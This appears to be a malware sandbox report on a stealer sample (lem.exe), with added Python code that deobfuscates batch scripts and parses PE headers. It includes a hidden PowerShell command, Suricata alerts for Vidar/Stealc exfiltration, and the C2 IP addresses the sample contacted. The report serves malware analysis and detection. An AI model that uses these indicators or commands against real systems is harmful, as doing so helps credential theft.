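def collect_sets(script: str) -> dict:
    """Map upper-cased variable names to their raw (unexpanded) values."""
    env = {}
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            env[m.group(1).upper()] = m.group(2)
    return env


def cmd_substring(value: str, start: int, length) -> str:
    """Emulate %VAR:~start,len%: a negative start counts from the end, a negative
    len drops that many trailing characters."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:max(e, s)]


def expand(line: str, env: dict) -> str:
    """One pass of %VAR% substitution; unresolved names are left literal so the
    analyst can see what the script depended on."""
    def sub(m):
        name = m.group(1).upper()
        if name not in env:
            return m.group(0)
        val = env[name]
        if m.group(2) is not None:
            val = cmd_substring(val, int(m.group(2)),
                                int(m.group(3)) if m.group(3) is not None else None)
        return val
    return REF_RE.sub(sub, line)


def expand_fully(line: str, env: dict) -> str:
    """Repeat expansion until stable, so values that themselves contain %VAR%
    references (set Cmd=%Kind%%Temp%) resolve too."""
    for _ in range(MAX_ROUNDS):
        new = expand(line, env)
        if new == line:
            break
        line = new
    return line


def deobfuscate(script: str) -> list:
    """Return the non-assignment lines that referenced variables, fully expanded."""
    env = collect_sets(script)
    commands = []
    for line in script.splitlines():
        if SET_RE.match(line) or "%" not in line:
            continue
        expanded = expand_fully(line, env)
        if expanded != line:
            commands.append(expanded.strip())
    return commands


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE_BATCH):
        print(cmd)
```

On the constructed script this yields "powershell -w hidden -c whoami". The static pass ignores evaluation order and delayed expansion (!VAR!), so a variable that is redefined before use, or assembled at runtime, needs to be traced through the script by hand; the unresolved %NAME% tokens left in the output point at exactly those places.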
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.969718034999908
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:lem.exe
                                                                        File size:863'224 bytes
                                                                        MD5:bb74165a5eb382a47e26f4efd8c2f151
                                                                        SHA1:cb6f613025a9b8cf64bd90ae3813beb4e872e93f
                                                                        SHA256:d3b3da570c489317ccaa129c2c66cc8765afaf20b5e4ccc24a88dd6b90e64920
                                                                        SHA512:b7eee12ed05aed95d20b28fab96ab6f033efa2a70efe38f487a7f19783cd69097b3b0361b12f3a9ce68ee001da0a0a27d0ddfeff9c85b5c668d9b20a2ec153b9
                                                                        SSDEEP:24576:1s2k09zcWIh8+6jQxF3jkwacXh9+Ip4S1P5v3:1k0Z/NaFzkeh9ES1P9
                                                                        TLSH:EF0523878AA86C2AEAA78DB1247485369E76FD0315F0C0CB9385C84DB771B4495FC36F
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                        Icon Hash:f1f8fae0cdcdee60
                                                                        Entrypoint:0x403883
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the digest inside the attached signature block does not match the file contents)
                                                                        Not Before, Not After
                                                                        • 07/06/2024 02:00:00 09/06/2027 01:59:59
                                                                        Subject Chain
                                                                        • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                                        Version:3
                                                                        Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                                        Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                                        Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                                        Serial:09D08EBDA06BE07C815EA7AF25EF6875
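Three of the fields above need a practitioner's reading. Digitally signed: true only records that a certificate blob is attached through the PE security data directory; Signature Valid: false with error -2146869232 (0x80096010, TRUST_E_BAD_DIGEST) means the digest inside that blob does not match the file, which is what a signature lifted from a legitimately signed VideoLAN binary, or a file modified after signing, looks like, so the VideoLAN subject must not be read as provenance. The compile timestamp (February 2012) predates the certificate's Not Before (June 2024) by twelve years, which fits a precompiled stub with a signature appended later, although an old timestamp alone is not decisive. The import hash is computed over the stub's import table and therefore identifies the packaging, not the payload; pivoting on it returns unrelated files built with the same stub. The following is an added example, not code from the report, that derives these header fields from raw bytes with the standard library only; build_sample_pe() constructs a minimal PE32 whose values mirror the report so the output can be compared against it, is not lem.exe, and uses an assumed security-directory offset and size.

```python
"""Added example, not code from the Joe Sandbox report or from the sample:
reproduce the PE header triage fields listed above (entrypoint, image base,
compile timestamp, OS version, subsystem, image and DLL characteristics, and
whether an Authenticode signature block is attached) from raw bytes using only
the standard library.  build_sample_pe() constructs a minimal PE32 header for
this example; it is not lem.exe, and its security-directory offset/size are
assumed values."""
import struct
from datetime import datetime, timezone

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # WIN_CERTIFICATE blob; entry holds a file offset, not an RVA

FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {1: "native", 2: "windows gui", 3: "windows cui"}


def _flags(value: int, table: dict) -> list:
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_triage(data: bytes) -> dict:
    """Return the header fields a triage report lists for a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _symtab, _nsyms, _opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    # Data directories follow the PE32 optional header at offset 96, 8 bytes each.
    sec_off, sec_size = 0, 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        sec_off, sec_size = struct.unpack_from(
            "<II", data, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "machine": machine,
        "sections": nsections,
        "entrypoint": image_base + entry_rva,
        "imagebase": image_base,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc)
                                 .strftime("%a %b %d %H:%M:%S %Y UTC"),
        "os_version": f"{os_major}.{os_minor}",
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "file_characteristics": _flags(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
        # "Digitally signed" only means a certificate blob is attached; whether its
        # embedded digest matches the file is a separate WinVerifyTrust check.
        "digitally_signed": sec_size != 0,
        "security_dir": (sec_off, sec_size),
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 header (example data, not lem.exe) whose field values
    mirror the report above so the parser output can be compared against it."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)                      # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    # COFF: i386, one section, timestamp, no symbols, PE32 optional header size,
    # EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into("<HHIIIHH", buf, 0x84, 0x14C, 1, 0x4F47E2DA, 0, 0, 0xE0, 0x0102)
    opt = 0x98
    struct.pack_into("<H", buf, opt, 0x10B)                      # PE32 magic
    struct.pack_into("<I", buf, opt + 16, 0x3883)                # AddressOfEntryPoint
    struct.pack_into("<I", buf, opt + 28, 0x400000)              # ImageBase
    struct.pack_into("<HH", buf, opt + 40, 5, 0)                 # OS version 5.0
    struct.pack_into("<HH", buf, opt + 68, 2, 0x8540)            # GUI; DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
    struct.pack_into("<I", buf, opt + 92, 16)                    # NumberOfRvaAndSizes
    # Security directory: assumed file offset and size of an attached certificate blob.
    struct.pack_into("<II", buf, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x1D0, 0x30)
    return bytes(buf)


if __name__ == "__main__":
    for key, value in parse_pe_triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run against the constructed header this prints entrypoint 0x403883, timestamp Fri Feb 24 19:19:54 2012 UTC, subsystem windows gui and the same characteristic flags as the report. Zeroing the security directory entry flips digitally_signed to False, which is all the report's "Digitally signed" field expresses; validating the blob's digest against the file, the step that failed here with TRUST_E_BAD_DIGEST, requires a full Authenticode verifier and is deliberately not attempted in this example.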
                                                                        Instruction
                                                                        sub esp, 000002D4h
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        push edi
                                                                        push 00000020h
                                                                        xor ebp, ebp
                                                                        pop esi
                                                                        mov dword ptr [esp+18h], ebp
                                                                        mov dword ptr [esp+10h], 00409268h
                                                                        mov dword ptr [esp+14h], ebp
                                                                        call dword ptr [00408030h]
                                                                        push 00008001h
                                                                        call dword ptr [004080B4h]
                                                                        push ebp
                                                                        call dword ptr [004082C0h]
                                                                        push 00000008h
                                                                        mov dword ptr [00472EB8h], eax
                                                                        call 00007F5954B3D8EBh
                                                                        push ebp
                                                                        push 000002B4h
                                                                        mov dword ptr [00472DD0h], eax
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push eax
                                                                        push ebp
                                                                        push 00409264h
                                                                        call dword ptr [00408184h]
                                                                        push 0040924Ch
                                                                        push 0046ADC0h
                                                                        call 00007F5954B3D5CDh
                                                                        call dword ptr [004080B0h]
                                                                        push eax
                                                                        mov edi, 004C30A0h
                                                                        push edi
                                                                        call 00007F5954B3D5BBh
                                                                        push ebp
                                                                        call dword ptr [00408134h]
                                                                        cmp word ptr [004C30A0h], 0022h
                                                                        mov dword ptr [00472DD8h], eax
                                                                        mov eax, edi
                                                                        jne 00007F5954B3AEBAh
                                                                        push 00000022h
                                                                        pop esi
                                                                        mov eax, 004C30A2h
                                                                        push esi
                                                                        push eax
                                                                        call 00007F5954B3D291h
                                                                        push eax
                                                                        call dword ptr [00408260h]
                                                                        mov esi, eax
                                                                        mov dword ptr [esp+1Ch], esi
                                                                        jmp 00007F5954B3AF43h
                                                                        push 00000020h
                                                                        pop ebx
                                                                        cmp ax, bx
                                                                        jne 00007F5954B3AEBAh
                                                                        add esi, 02h
                                                                        cmp word ptr [esi], bx
                                                                        Programming Language:
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [ C ] VS2010 SP1 build 40219
                                                                        • [RES] VS2010 SP1 build 40219
                                                                        • [LNK] VS2010 SP1 build 40219
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x4460 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcd088 | 0x5b70 | .ndata
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc | 0xf4000 | 0x4460 | 0x4600 | bc040da62825804f5e6ba24f4e31f844 | False | 0.8466517857142857 | data | 7.247087220796674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc | 0xf9000 | 0xf32 | 0x1000 | 9a36c77062417185e9e84210d8c60955 | False | 1.002685546875 | data | 7.931927207151483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                        RT_ICON | 0xf41f0 | 0x2751 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010928961748633
                                                                        RT_ICON | 0xf6948 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6955828779599271
                                                                        RT_ICON | 0xf7a70 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8200354609929078
                                                                        RT_DIALOG | 0xf7ed8 | 0x100 | data | English | United States | 0.5234375
                                                                        RT_DIALOG | 0xf7fd8 | 0x11c | data | English | United States | 0.6056338028169014
                                                                        RT_DIALOG | 0xf80f8 | 0x60 | data | English | United States | 0.7291666666666666
                                                                        RT_GROUP_ICON | 0xf8158 | 0x30 | data | English | United States | 0.8541666666666666
                                                                        RT_MANIFEST | 0xf8188 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
                                                                        DLL | Import
                                                                        KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                        USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                        GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                        COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                        Language of compilation system | Country where language is spoken | Map
                                                                        English | United States | 
                                                                        Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                                                        2024-08-05T18:55:53.040452+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49715 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:37.229200+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49737 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:56.073425+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49717 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:09.165224+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49725 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:48.655006+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49748 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:51.591528+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49713 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:51.563057+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49750 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:56.753779+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 49717 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:53.756676+0200 | TCP | 2054495 | ET MALWARE Vidar Stealer Form Exfil | 49752 | 80 | 192.168.2.5 | 38.180.132.96
                                                                        2024-08-05T18:56:42.427737+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49742 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:35.159350+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49735 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:04.615928+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49722 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:44.328736+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49744 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:59.114134+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49719 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:47.466732+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49747 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:54.663227+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49716 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:22.171975+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49732 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:26.168708+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49734 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:39.235253+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49739 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:19.713700+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49730 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:46.372825+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49746 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:52.926886+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49751 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:38.198914+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49738 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:58.307206+0200 | TCP | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 443 | 49718 | 188.245.87.202 | 192.168.2.5
                                                                        2024-08-05T18:56:13.087106+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49727 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:11.170074+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49726 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:36.234067+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49736 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:55.352655+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 49716 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:40.332124+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49740 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:43.444404+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49743 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:57.620373+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49718 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:05.840854+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49723 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:41.322529+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49741 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:03.317760+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49721 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:20.793047+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49731 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:23.785268+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49733 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:07.183514+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49724 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:55:56.754342+0200 | TCP | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 443 | 49717 | 188.245.87.202 | 192.168.2.5
                                                                        2024-08-05T18:56:45.398883+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49745 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:14.802464+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49728 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:16.411777+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49729 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:49.549343+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49749 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        2024-08-05T18:56:00.308967+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49720 | 443 | 192.168.2.5 | 188.245.87.202
                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Aug 5, 2024 18:55:49.008832932 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.008878946 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:49.008960962 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.018925905 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.018939972 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:49.757499933 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:49.757817030 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.830049038 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.830079079 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:49.830538988 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:49.830605984 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.832839966 CEST | 49712 | 443 | 192.168.2.5 | 104.102.49.249
                                                                        Aug 5, 2024 18:55:49.876506090 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
                                                                        Aug 5, 2024 18:55:50.505265951 CEST | 443 | 49712 | 104.102.49.249 | 192.168.2.5
